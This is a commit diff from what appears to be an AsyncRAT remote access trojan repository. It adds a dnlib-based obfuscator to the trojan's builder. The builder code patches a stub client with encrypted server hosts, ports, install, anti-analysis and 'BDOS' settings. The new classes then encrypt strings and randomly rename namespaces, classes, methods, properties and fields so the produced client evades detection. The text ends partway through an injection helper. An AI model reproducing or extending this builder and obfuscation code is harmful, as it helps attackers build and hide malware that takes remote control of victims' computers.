Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add dnlib obfuscator

Browse Source
This commit is contained in:
NYAN CAT 2019-05-31 13:58:00 +03:00
parent 3bca3b8b8c
commit 130bb65d4e
19 changed files with 1092 additions and 367 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
View File

@ -50,13 +50,13 @@
<SpecificVersion>False</SpecificVersion>
<HintPath>Resources\cGeoIp.dll</HintPath>
</Reference>
<Reference Include="dnlib, Version=3.2.0.0, Culture=neutral, PublicKeyToken=50e96378b6e77999, processorArchitecture=MSIL">
<HintPath>..\packages\dnlib.3.2.0\lib\net45\dnlib.dll</HintPath>
</Reference>
<Reference Include="FastColoredTextBox, Version=2.16.24.0, Culture=neutral, PublicKeyToken=fb8aa12b994ef61b, processorArchitecture=MSIL">
<HintPath>..\packages\FCTB.2.16.24\lib\FastColoredTextBox.dll</HintPath>
</Reference>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="Mono.Cecil, Version=0.10.3.0, Culture=neutral, PublicKeyToken=50cebf1cceb9d05e, processorArchitecture=MSIL">
<HintPath>..\packages\Mono.Cecil.0.10.3\lib\net40\Mono.Cecil.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.IO.Compression" />
@ -187,7 +187,6 @@
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Handle Packet\HandleProcessManager.cs" />
<Compile Include="Helper\AsyncTask.cs" />
<Compile Include="Helper\BuildRenamer.cs" />
<Compile Include="Helper\IconInjector.cs" />
<Compile Include="Helper\ListViewColumnSorter.cs" />
<Compile Include="Helper\Methods.cs" />
@ -210,6 +209,19 @@
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
<Compile Include="RenamingObfuscation\Classes\Base64.cs" />
<Compile Include="RenamingObfuscation\Classes\ClassesRenaming.cs" />
<Compile Include="RenamingObfuscation\Classes\DecryptionHelper.cs" />
<Compile Include="RenamingObfuscation\Classes\FieldsRenaming.cs" />
<Compile Include="RenamingObfuscation\Classes\InjectHelper.cs" />
<Compile Include="RenamingObfuscation\Classes\MethodsRenaming.cs" />
<Compile Include="RenamingObfuscation\Classes\NamespacesRenaming.cs" />
<Compile Include="RenamingObfuscation\Classes\PropertiesRenaming.cs" />
<Compile Include="RenamingObfuscation\Classes\Utils.cs" />
<Compile Include="RenamingObfuscation\EncryptString.cs" />
<Compile Include="RenamingObfuscation\Interfaces\ICrypto.cs" />
<Compile Include="RenamingObfuscation\Interfaces\IRenaming.cs" />
<Compile Include="RenamingObfuscation\ModuleDefMD.cs" />
<Compile Include="Settings.cs" />
<Compile Include="Socket\Clients.cs" />
<Compile Include="Socket\Listener.cs" />

242
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs
View File

@ -1,15 +1,17 @@
using System;
using System.Windows.Forms;
using Mono.Cecil;
using AsyncRAT_Sharp.Helper;
using Mono.Cecil.Cil;
using System.Text;
using System.Security.Cryptography;
using AsyncRAT_Sharp.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Collections.Generic;
using Vestris.ResourceLib;
using System.Drawing;
using dnlib.DotNet;
using System.IO;
using System.Linq;
using dnlib.DotNet.Emit;
using AsyncRAT_Sharp.RenamingObfuscation;
namespace AsyncRAT_Sharp.Forms
{
@ -91,109 +93,6 @@ namespace AsyncRAT_Sharp.Forms
catch { }
}
private void WriteSettings(AssemblyDefinition asmDef)
{
var key = Methods.GetRandomString(32);
var aes = new Aes256(key);
var caCertificate = new X509Certificate2(Settings.CertificatePath, "", X509KeyStorageFlags.Exportable);
var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert));
byte[] signature;
using (var csp = (RSACryptoServiceProvider)caCertificate.PrivateKey)
{
var hash = Sha256.ComputeHash(Encoding.UTF8.GetBytes(key));
signature = csp.SignHash(hash, CryptoConfig.MapNameToOID("SHA256"));
}
foreach (var typeDef in asmDef.Modules[0].Types)
{
if (typeDef.FullName == "Client.Settings")
{
foreach (var methodDef in typeDef.Methods)
{
if (methodDef.Name == ".cctor")
{
for (int i = 0; i < methodDef.Body.Instructions.Count; i++)
{
if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldstr)
{
string operand = methodDef.Body.Instructions[i].Operand.ToString();
if (operand == "%Ports%")
{
if (chkPastebin.Enabled && chkPastebin.Checked)
{
methodDef.Body.Instructions[i].Operand = aes.Encrypt("null");
}
else
{
List<string> LString = new List<string>();
foreach (string port in listBoxPort.Items)
{
LString.Add(port);
}
methodDef.Body.Instructions[i].Operand = aes.Encrypt(string.Join(",", LString));
}
}
if (operand == "%Hosts%")
{
if (chkPastebin.Enabled && chkPastebin.Checked)
{
methodDef.Body.Instructions[i].Operand = aes.Encrypt("null");
}
else
{
List<string> LString = new List<string>();
foreach (string ip in listBoxIP.Items)
{
LString.Add(ip);
}
methodDef.Body.Instructions[i].Operand = aes.Encrypt(string.Join(",", LString));
}
}
if (operand == "%Install%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(checkBox1.Checked.ToString().ToLower());
if (operand == "%Folder%")
methodDef.Body.Instructions[i].Operand = comboBoxFolder.Text;
if (operand == "%File%")
methodDef.Body.Instructions[i].Operand = textFilename.Text;
if (operand == "%Version%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Settings.Version);
if (operand == "%Key%")
methodDef.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(key));
if (operand == "%MTX%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtMutex.Text);
if (operand == "%Anti%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(chkAnti.Checked.ToString().ToLower());
if (operand == "%Certificate%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert)));
if (operand == "%Serversignature%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
if (operand == "%BDOS%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(chkBdos.Checked.ToString().ToLower());
if (operand == "%Pastebin%")
if (chkPastebin.Checked)
methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text);
else
methodDef.Body.Instructions[i].Operand = aes.Encrypt("null");
}
}
}
}
}
}
}
private void CheckBox2_CheckedChanged(object sender, EventArgs e)
{
@ -287,15 +186,10 @@ namespace AsyncRAT_Sharp.Forms
try
{
using (AssemblyDefinition asmDef = AssemblyDefinition.ReadAssembly(@"Stub/Stub.exe"))
using (ModuleDefMD asmDef = ModuleDefMD.Load(@"Stub/Stub.exe"))
{
WriteSettings(asmDef);
Renamer r = new Renamer(asmDef);
if (!r.Perform())
throw new Exception("renaming failed");
using (SaveFileDialog saveFileDialog1 = new SaveFileDialog())
{
saveFileDialog1.Filter = ".exe (*.exe)|*.exe";
@ -304,8 +198,10 @@ namespace AsyncRAT_Sharp.Forms
saveFileDialog1.FileName = "Client";
if (saveFileDialog1.ShowDialog() == DialogResult.OK)
{
r.AsmDef.Write(saveFileDialog1.FileName);
r.AsmDef.Dispose();
EncryptString.DoEncrypt(asmDef);
Renaming.DoRenaming(asmDef);
asmDef.Write(saveFileDialog1.FileName);
asmDef.Dispose();
if (btnAssembly.Checked)
{
WriteAssembly(saveFileDialog1.FileName);
@ -414,5 +310,123 @@ namespace AsyncRAT_Sharp.Forms
}
}
}
private void WriteSettings(ModuleDefMD asmDef)
{
var key = Methods.GetRandomString(32);
var aes = new Aes256(key);
var caCertificate = new X509Certificate2(Settings.CertificatePath, "", X509KeyStorageFlags.Exportable);
var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert));
byte[] signature;
using (var csp = (RSACryptoServiceProvider)caCertificate.PrivateKey)
{
var hash = Sha256.ComputeHash(Encoding.UTF8.GetBytes(key));
signature = csp.SignHash(hash, CryptoConfig.MapNameToOID("SHA256"));
}
foreach (TypeDef type in asmDef.Types)
{
if (type.Name == "Settings")
foreach (MethodDef method in type.Methods)
{
if (method.Body == null) continue;
for (int i = 0; i < method.Body.Instructions.Count(); i++)
{
if (method.Body.Instructions[i].OpCode == OpCodes.Ldstr)
{
if (method.Body.Instructions[i].Operand.ToString() == "%Ports%")
{
if (chkPastebin.Enabled && chkPastebin.Checked)
{
method.Body.Instructions[i].Operand = aes.Encrypt("null");
}
else
{
List<string> LString = new List<string>();
foreach (string port in listBoxPort.Items)
{
LString.Add(port);
}
method.Body.Instructions[i].Operand = aes.Encrypt(string.Join(",", LString));
}
}
if (method.Body.Instructions[i].Operand.ToString() == "%Hosts%")
{
if (chkPastebin.Enabled && chkPastebin.Checked)
{
method.Body.Instructions[i].Operand = aes.Encrypt("null");
}
else
{
List<string> LString = new List<string>();
foreach (string ip in listBoxIP.Items)
{
LString.Add(ip);
}
method.Body.Instructions[i].Operand = aes.Encrypt(string.Join(",", LString));
}
}
if (method.Body.Instructions[i].Operand.ToString() == "%Install%")
method.Body.Instructions[i].Operand = aes.Encrypt(checkBox1.Checked.ToString().ToLower());
if (method.Body.Instructions[i].Operand.ToString() == "%Folder%")
method.Body.Instructions[i].Operand = comboBoxFolder.Text;
if (method.Body.Instructions[i].Operand.ToString() == "%File%")
method.Body.Instructions[i].Operand = textFilename.Text;
if (method.Body.Instructions[i].Operand.ToString() == "%Version%")
method.Body.Instructions[i].Operand = aes.Encrypt(Settings.Version);
if (method.Body.Instructions[i].Operand.ToString() == "%Key%")
method.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(key));
if (method.Body.Instructions[i].Operand.ToString() == "%MTX%")
method.Body.Instructions[i].Operand = aes.Encrypt(txtMutex.Text);
if (method.Body.Instructions[i].Operand.ToString() == "%Anti%")
method.Body.Instructions[i].Operand = aes.Encrypt(chkAnti.Checked.ToString().ToLower());
if (method.Body.Instructions[i].Operand.ToString() == "%Certificate%")
method.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert)));
if (method.Body.Instructions[i].Operand.ToString() == "%Serversignature%")
method.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
if (method.Body.Instructions[i].Operand.ToString() == "%BDOS%")
method.Body.Instructions[i].Operand = aes.Encrypt(chkBdos.Checked.ToString().ToLower());
if (method.Body.Instructions[i].Operand.ToString() == "%Pastebin%")
if (chkPastebin.Checked)
method.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text);
else
method.Body.Instructions[i].Operand = aes.Encrypt("null");
}
}
}
}
}
private readonly Random random = new Random();
const string alphabet = "asdfghjklqwertyuiopmnbvcxz";
public string getRandomCharacters()
{
var sb = new StringBuilder();
for (int i = 1; i <= new Random().Next(10,20); i++)
{
var randomCharacterPosition = random.Next(0, alphabet.Length);
sb.Append(alphabet[randomCharacterPosition]);
}
return sb.ToString();
}
}
}

235
AsyncRAT-C#/AsyncRAT-Sharp/Helper/BuildRenamer.cs
View File

@ -1,235 +0,0 @@
using Mono.Cecil;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Helper
{
//creadit Quasar.Server/Build/Renamer.cs
public class Renamer
{
public AssemblyDefinition AsmDef { get; set; }
private int Length { get; set; }
private MemberOverloader _typeOverloader;
private Dictionary<TypeDefinition, MemberOverloader> _methodOverloaders;
private Dictionary<TypeDefinition, MemberOverloader> _fieldOverloaders;
private Dictionary<TypeDefinition, MemberOverloader> _eventOverloaders;
public Renamer(AssemblyDefinition asmDef)
: this(asmDef, 20)
{
}
public Renamer(AssemblyDefinition asmDef, int length)
{
this.AsmDef = asmDef;
this.Length = length;
_typeOverloader = new MemberOverloader(this.Length);
_methodOverloaders = new Dictionary<TypeDefinition, MemberOverloader>();
_fieldOverloaders = new Dictionary<TypeDefinition, MemberOverloader>();
_eventOverloaders = new Dictionary<TypeDefinition, MemberOverloader>();
}
public bool Perform()
{
try
{
foreach (TypeDefinition typeDef in AsmDef.Modules.SelectMany(module => module.Types))
{
RenameInType(typeDef);
}
return true;
}
catch
{
return false;
}
}
private void RenameInType(TypeDefinition typeDef)
{
if (!typeDef.Namespace.StartsWith("Client"))
return;
_typeOverloader.GiveName(typeDef);
typeDef.Namespace = string.Empty;
MemberOverloader methodOverloader = GetMethodOverloader(typeDef);
MemberOverloader fieldOverloader = GetFieldOverloader(typeDef);
MemberOverloader eventOverloader = GetEventOverloader(typeDef);
if (typeDef.HasNestedTypes)
foreach (TypeDefinition nestedType in typeDef.NestedTypes)
RenameInType(nestedType);
if (typeDef.HasMethods)
foreach (MethodDefinition methodDef in
typeDef.Methods.Where(methodDef =>
!methodDef.IsConstructor && !methodDef.HasCustomAttributes &&
!methodDef.IsAbstract && !methodDef.IsVirtual))
methodOverloader.GiveName(methodDef);
if (typeDef.HasFields)
foreach (FieldDefinition fieldDef in typeDef.Fields)
fieldOverloader.GiveName(fieldDef);
if (typeDef.HasEvents)
foreach (EventDefinition eventDef in typeDef.Events)
eventOverloader.GiveName(eventDef);
}
private MemberOverloader GetMethodOverloader(TypeDefinition typeDef)
{
return GetOverloader(this._methodOverloaders, typeDef);
}
private MemberOverloader GetFieldOverloader(TypeDefinition typeDef)
{
return GetOverloader(this._fieldOverloaders, typeDef);
}
private MemberOverloader GetEventOverloader(TypeDefinition typeDef)
{
return GetOverloader(this._eventOverloaders, typeDef);
}
private MemberOverloader GetOverloader(Dictionary<TypeDefinition, MemberOverloader> overloaderDictionary,
TypeDefinition targetTypeDef)
{
MemberOverloader overloader;
if (!overloaderDictionary.TryGetValue(targetTypeDef, out overloader))
{
overloader = new MemberOverloader(this.Length);
overloaderDictionary.Add(targetTypeDef, overloader);
}
return overloader;
}
private class MemberOverloader
{
private bool DoRandom { get; set; }
private int StartingLength { get; set; }
private readonly Dictionary<string, string> _renamedMembers = new Dictionary<string, string>();
private readonly char[] _charMap;
private readonly SafeRandom _random = new SafeRandom();
private int[] _indices;
public MemberOverloader(int startingLength, bool doRandom = true)
: this(startingLength, doRandom, "ABCDEFGHIJKLMNOPQRSTUVWXYZ".ToLower().ToCharArray())
{
}
private MemberOverloader(int startingLength, bool doRandom, char[] chars)
{
this._charMap = chars;
this.DoRandom = doRandom;
this.StartingLength = startingLength;
this._indices = new int[startingLength];
}
public void GiveName(MemberReference member)
{
string currentName = GetCurrentName();
string originalName = member.ToString();
member.Name = currentName;
while (_renamedMembers.ContainsValue(member.ToString()))
{
member.Name = GetCurrentName();
}
_renamedMembers.Add(originalName, member.ToString());
}
private string GetCurrentName()
{
return DoRandom ? GetRandomName() : GetOverloadedName();
}
private string GetRandomName()
{
StringBuilder builder = new StringBuilder();
for (int i = 0; i < StartingLength; i++)
{
builder.Append((char)_random.Next(int.MinValue, int.MaxValue));
}
return builder.ToString();
}
private string GetOverloadedName()
{
IncrementIndices();
char[] chars = new char[_indices.Length];
for (int i = 0; i < _indices.Length; i++)
chars[i] = _charMap[_indices[i]];
return new string(chars);
}
private void IncrementIndices()
{
for (int i = _indices.Length - 1; i >= 0; i--)
{
_indices[i]++;
if (_indices[i] >= _charMap.Length)
{
if (i == 0)
Array.Resize(ref _indices, _indices.Length + 1);
_indices[i] = 0;
}
else
break;
}
}
}
}
public class SafeRandom
{
private static readonly RandomNumberGenerator GlobalCryptoProvider = RandomNumberGenerator.Create();
[ThreadStatic]
private static Random _random;
private static Random GetRandom()
{
if (_random == null)
{
byte[] buffer = new byte[4];
GlobalCryptoProvider.GetBytes(buffer);
_random = new Random(BitConverter.ToInt32(buffer, 0));
}
return _random;
}
public int Next()
{
return GetRandom().Next();
}
public int Next(int maxValue)
{
return GetRandom().Next(maxValue);
}
public int Next(int minValue, int maxValue)
{
return GetRandom().Next(minValue, maxValue);
}
public void NextBytes(byte[] buffer)
{
GetRandom().NextBytes(buffer);
}
public double NextDouble()
{
return GetRandom().NextDouble();
}
}
}

43
AsyncRAT-C#/AsyncRAT-Sharp/ModuleDefMD.cs Normal file
View File

@ -0,0 +1,43 @@
using AsyncRAT_Sharp.RenamingObfuscation.Classes;
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation
{
public class Renaming
{
public static ModuleDefMD DoRenaming(ModuleDefMD inPath)
{
ModuleDefMD module = inPath;
return RenamingObfuscation(inPath);
}
private static ModuleDefMD RenamingObfuscation(ModuleDefMD inModule)
{
ModuleDefMD module = inModule;
IRenaming rnm = new NamespacesRenaming();
module = rnm.Rename(module);
rnm = new ClassesRenaming();
module = rnm.Rename(module);
rnm = new MethodsRenaming();
module = rnm.Rename(module);
rnm = new PropertiesRenaming();
module = rnm.Rename(module);
rnm = new FieldsRenaming();
module = rnm.Rename(module);
return module;
}
}
}

30
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/Base64.cs Normal file
View File

@ -0,0 +1,30 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
public class Base64 : ICrypto
{
/// <summary>
/// Method for encrypt string with Base64.
/// </summary>
/// <param name="dataPlain">Input plain string</param>
/// <returns>Encode string</returns>
public string Encrypt(string dataPlain)
{
try
{
return Convert.ToBase64String(Encoding.UTF8.GetBytes(dataPlain));
}
catch (Exception)
{
return null;
}
}
}
}

80
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/ClassesRenaming.cs Normal file
View File

@ -0,0 +1,80 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System.Collections.Generic;
using System.Linq;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
public class ClassesRenaming : IRenaming
{
private static Dictionary<string, string> _names = new Dictionary<string, string>();
public ModuleDefMD Rename(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
foreach (TypeDef type in moduleToRename.GetTypes())
{
if (type.IsGlobalModuleType)
continue;
if (type.Name == "GeneratedInternalTypeHelper" || type.Name == "Resources")
continue;
string nameValue;
if (_names.TryGetValue(type.Name, out nameValue))
type.Name = nameValue;
else
{
string newName = Utils.GenerateRandomString();
_names.Add(type.Name, newName);
type.Name = newName;
}
}
return ApplyChangesToResources(moduleToRename);
}
private static ModuleDefMD ApplyChangesToResources(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
foreach (var resource in moduleToRename.Resources)
{
foreach (var item in _names)
{
if (resource.Name.Contains(item.Key))
{
resource.Name = resource.Name.Replace(item.Key, item.Value);
}
}
}
foreach (TypeDef type in moduleToRename.GetTypes())
{
foreach (var property in type.Properties)
{
if (property.Name != "ResourceManager")
continue;
var instr = property.GetMethod.Body.Instructions;
for (int i = 0; i < instr.Count; i++)
{
if (instr[i].OpCode == OpCodes.Ldstr)
{
foreach (var item in _names)
{
if (instr[i].Operand.ToString().Contains(item.Key))
instr[i].Operand = instr[i].Operand.ToString().Replace(item.Key, item.Value);
}
}
}
}
}
return moduleToRename;
}
}
}

29
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/DecryptionHelper.cs Normal file
View File

@ -0,0 +1,29 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
internal static class DecryptionHelper
{
/// <summary>
/// Method for decrypt string with Base64.
/// </summary>
/// <param name="dataEnc">Input encode string</param>
/// <returns>Plain string</returns>
public static string Decrypt_Base64(string dataEnc)
{
try
{
return Encoding.UTF8.GetString(Convert.FromBase64String(dataEnc));
}
catch (Exception)
{
return null;
}
}
}
}

77
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/FieldsRenaming.cs Normal file
View File

@ -0,0 +1,77 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System.Collections.Generic;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
public class FieldsRenaming : IRenaming
{
private static Dictionary<string, string> _names = new Dictionary<string, string>();
public ModuleDefMD Rename(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
foreach (TypeDef type in moduleToRename.GetTypes())
{
if (type.IsGlobalModuleType)
continue;
foreach (var field in type.Fields)
{
string nameValue;
if (_names.TryGetValue(field.Name, out nameValue))
field.Name = nameValue;
else
{
if (!field.IsSpecialName && !field.HasCustomAttributes)
{
string newName = Utils.GenerateRandomString();
_names.Add(field.Name, newName);
field.Name = newName;
}
}
}
}
return ApplyChangesToResources(moduleToRename);
}
private static ModuleDefMD ApplyChangesToResources(ModuleDefMD module)
{
ModuleDefMD moduleToRename = module;
foreach (TypeDef type in moduleToRename.GetTypes())
{
if (type.IsGlobalModuleType)
continue;
foreach (MethodDef method in type.Methods)
{
if (method.Name != "InitializeComponent")
continue;
var instr = method.Body.Instructions;
for (int i = 0; i < instr.Count - 3; i++)
{
if (instr[i].OpCode == OpCodes.Ldstr)
{
foreach (var item in _names)
{
if (item.Key == instr[i].Operand.ToString())
{
instr[i].Operand = item.Value;
}
}
}
}
}
}
return moduleToRename;
}
}
}

360
AsyncRAT-C#/AsyncRAT-Sharp/RenamingObfuscation/Classes/InjectHelper.cs Normal file
View File

@ -0,0 +1,360 @@
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System.Collections.Generic;
using System.Linq;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
{
public static class InjectHelper
{
/// <summary>
/// Clones the specified origin TypeDef.
/// </summary>
/// <param name="origin">The origin TypeDef.</param>
/// <returns>The cloned TypeDef.</returns>
static TypeDefUser Clone(TypeDef origin)
{
var ret = new TypeDefUser(origin.Namespace, origin.Name);
ret.Attributes = origin.Attributes;
if (origin.ClassLayout != null)
ret.ClassLayout = new ClassLayoutUser(origin.ClassLayout.PackingSize, origin.ClassSize);
foreach (GenericParam genericParam in origin.GenericParameters)
ret.GenericParameters.Add(new GenericParamUser(genericParam.Number, genericParam.Flags, "-"));
return ret;
}
/// <summary>
/// Clones the specified origin MethodDef.
/// </summary>
/// <param name="origin">The origin MethodDef.</param>
/// <returns>The cloned MethodDef.</returns>
static MethodDefUser Clone(MethodDef origin)
{
var ret = new MethodDefUser(origin.Name, null, origin.ImplAttributes, origin.Attributes);
foreach (GenericParam genericParam in origin.GenericParameters)
ret.GenericParameters.Add(new GenericParamUser(genericParam.Number, genericParam.Flags, "-"));
return ret;
}
/// <summary>
/// Clones the specified origin FieldDef.
/// </summary>
/// <param name="origin">The origin FieldDef.</param>
/// <returns>The cloned FieldDef.</returns>
static FieldDefUser Clone(FieldDef origin)
{
var ret = new FieldDefUser(origin.Name, null, origin.Attributes);
return ret;
}
/// <summary>
/// Populates the context mappings.
/// </summary>
/// <param name="typeDef">The origin TypeDef.</param>
/// <param name="ctx">The injection context.</param>
/// <returns>The new TypeDef.</returns>
static TypeDef PopulateContext(TypeDef typeDef, InjectContext ctx)
{
TypeDef ret;
IDnlibDef existing;
if (!ctx.Map.TryGetValue(typeDef, out existing))
{
ret = Clone(typeDef);
ctx.Map[typeDef] = ret;
}
else
ret = (TypeDef)existing;
foreach (TypeDef nestedType in typeDef.NestedTypes)
ret.NestedTypes.Add(PopulateContext(nestedType, ctx));
foreach (MethodDef method in typeDef.Methods)
ret.Methods.Add((MethodDef)(ctx.Map[method] = Clone(method)));
foreach (FieldDef field in typeDef.Fields)
ret.Fields.Add((FieldDef)(ctx.Map[field] = Clone(field)));
return ret;
}
/// <summary>
/// Copies the information from the origin type to injected type.
/// </summary>
/// <param name="typeDef">The origin TypeDef.</param>
/// <param name="ctx">The injection context.</param>
static void CopyTypeDef(TypeDef typeDef, InjectContext ctx)
{
var newTypeDef = (TypeDef)ctx.Map[typeDef];
newTypeDef.BaseType = (ITypeDefOrRef)ctx.Importer.Import(typeDef.BaseType);
foreach (InterfaceImpl iface in typeDef.Interfaces)
newTypeDef.Interfaces.Add(new InterfaceImplUser((ITypeDefOrRef)ctx.Importer.Import(iface.Interface)));
}
/// <summary>
/// Copies the information from the origin method to injected method.
/// </summary>
/// <param name="methodDef">The origin MethodDef.</param>
/// <param name="ctx">The injection context.</param>
static void CopyMethodDef(MethodDef methodDef, InjectContext ctx)
{
var newMethodDef = (MethodDef)ctx.Map[methodDef];
newMethodDef.Signature = ctx.Importer.Import(methodDef.Signature);
newMethodDef.Parameters.UpdateParameterTypes();
if (methodDef.ImplMap != null)
newMethodDef.ImplMap = new ImplMapUser(new ModuleRefUser(ctx.TargetModule, methodDef.ImplMap.Module.Name), methodDef.ImplMap.Name, methodDef.ImplMap.Attributes);
foreach (CustomAttribute ca in methodDef.CustomAttributes)
newMethodDef.CustomAttributes.Add(new CustomAttribute((ICustomAttributeType)ctx.Importer.Import(ca.Constructor)));
if (methodDef.HasBody)
{
newMethodDef.Body = new CilBody(methodDef.Body.InitLocals, new List<Instruction>(), new List<ExceptionHandler>(), new List<Local>());
newMethodDef.Body.MaxStack = methodDef.Body.MaxStack;
var bodyMap = new Dictionary<object, object>();
foreach (Local local in methodDef.Body.Variables)
{
var newLocal = new Local(ctx.Importer.Import(local.Type));
newMethodDef.Body.Variables.Add(newLocal);
newLocal.Name = local.Name;
bodyMap[local] = newLocal;
}
foreach (Instruction instr in methodDef.Body.Instructions)
{
var newInstr = new Instruction(instr.OpCode, instr.Operand);
newInstr.SequencePoint = instr.SequencePoint;
if (newInstr.Operand is IType)
newInstr.Operand = ctx.Importer.Import((IType)newInstr.Operand);
else if (newInstr.Operand is IMethod)
newInstr.Operand = ctx.Importer.Import((IMethod)newInstr.Operand);
else if (newInstr.Operand is IField)
newInstr.Operand = ctx.Importer.Import((IField)newInstr.Operand);
newMethodDef.Body.Instructions.Add(newInstr);
bodyMap[instr] = newInstr;
}
foreach (Instruction instr in newMethodDef.Body.Instructions)
{
if (instr.Operand != null && bodyMap.ContainsKey(instr.Operand))
instr.Operand = bodyMap[instr.Operand];
else if (instr.Operand is Instruction[])
instr.Operand = ((Instruction[])instr.Operand).Select(target => (Instruction)bodyMap[target]).ToArray();
}
foreach (ExceptionHandler eh in methodDef.Body.ExceptionHandlers)
newMethodDef.Body.ExceptionHandlers.Add(new ExceptionHandler(eh.HandlerType)
{
CatchType = eh.CatchType == null ? null : (ITypeDefOrRef)ctx.Importer.Import(eh.CatchType),
TryStart = (Instruction)bodyMap[eh.TryStart],
TryEnd = (Instruction)bodyMap[eh.TryEnd],
HandlerStart = (Instruction)bodyMap[eh.HandlerStart],
HandlerEnd = (Instruction)bodyMap[eh.HandlerEnd],
FilterStart = eh.FilterStart == null ? null : (Instruction)bodyMap[eh.FilterStart]
});
newMethodDef.Body.SimplifyMacros(newMethodDef.Parameters);
}
}
/// <summary>
/// Copies the information from the origin field to injected field.
/// </summary>
/// <param name="fieldDef">The origin FieldDef.</param>
/// <param name="ctx">The injection context.</param>
static void CopyFieldDef(FieldDef fieldDef, InjectContext ctx)
{
var newFieldDef = (FieldDef)ctx.Map[fieldDef];
newFieldDef.Signature = ctx.Importer.Import(fieldDef.Signature);
}
/// <summary>
/// Copies the information to the injected definitions.
/// </summary>
/// <param name="typeDef">The origin TypeDef.</param>
/// <param name="ctx">The injection context.</param>
/// <param name="copySelf">if set to <c>true</c>, copy information of <paramref name="typeDef" />.</param>
static void Copy(TypeDef typeDef, InjectContext ctx, bool copySelf)
{
if (copySelf)
CopyTypeDef(typeDef, ctx);
foreach (TypeDef nestedType in typeDef.NestedTypes)
Copy(nestedType, ctx, true);
foreach (MethodDef method in typeDef.Methods)
CopyMethodDef(method, ctx);
foreach (FieldDef field in typeDef.Fields)
CopyFieldDef(field, ctx);
}
/// <summary>
/// Injects the specified TypeDef to another module.
/// </summary>
/// <param name="typeDef">The source TypeDef.</param>
/// <param name="target">The target module.</param>
/// <returns>The injected TypeDef.</returns>
public static TypeDef Inject(TypeDef typeDef, ModuleDef target)
{
var ctx = new InjectContext(typeDef.Module, target);
PopulateContext(typeDef, ctx);
Copy(typeDef, ctx, true);
return (TypeDef)ctx.Map[typeDef];
}
/// <summary>
/// Injects the specified MethodDef to another module.
/// </summary>
/// <param name="methodDef">The source MethodDef.</param>
/// <param name="target">The target module.</param>
/// <returns>The injected MethodDef.</returns>
public static MethodDef Inject(MethodDef methodDef, ModuleDef target)
{
var ctx = new InjectContext(methodDef.Module, target);
ctx.Map[methodDef] = Clone(methodDef);
CopyMethodDef(methodDef, ctx);
return (MethodDef)ctx.Map[methodDef];
}
/// <summary>
/// Injects the members of specified TypeDef to another module.
/// </summary>
/// <param name="typeDef">The source TypeDef.</param>
/// <param name="newType">The new type.</param>
/// <param name="target">The target module.</param>
/// <returns>Injected members.</returns>
public static IEnumerable<IDnlibDef> Inject(TypeDef typeDef, TypeDef newType, ModuleDef target)
{
var ctx = new InjectContext(typeDef.Module, target);
ctx.Map[typeDef] = newType;
PopulateContext(typeDef, ctx);
Copy(typeDef, ctx, false);
return ctx.Map.Values.Except(new[] { newType });
}
public class ImportResolver
{
/// <summary>
/// Resolves the specified TypeDef.
/// </summary>
/// <param name="typeDef">The TypeDef.</param>
/// <returns>The resolved TypeDef, or <c>null</c> if cannot be resolved.</returns>
public virtual TypeDef Resolve(TypeDef typeDef)
{
return null;
}
/// <summary>
/// Resolves the specified MethodDef.
/// </summary>
/// <param name="methodDef">The MethodDef.</param>
